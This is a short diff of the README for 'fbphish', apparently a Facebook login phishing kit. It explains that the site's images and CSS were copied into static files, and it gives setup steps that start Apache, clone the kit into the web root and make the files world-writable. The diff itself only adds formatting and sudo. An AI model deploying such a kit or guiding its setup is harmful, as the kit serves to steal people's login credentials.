0xyg3n/fbphish/README.md

 I just collected all the images and the css code and i made them static to the code so it doesn't also require to send any requests to facebook.com.

 ## Usage
-1. service apache2 start
+1. `sudo service apache2 start`
-2. git clone https://github.com/0xyg3n/fbphish /var/www/html
+2. `git clone https://github.com/0xyg3n/fbphish /var/www/html`
-3. chmod 777 /var/www/html/*
+3. `sudo chmod 777 /var/www/html/* `

 ##Troubleshooting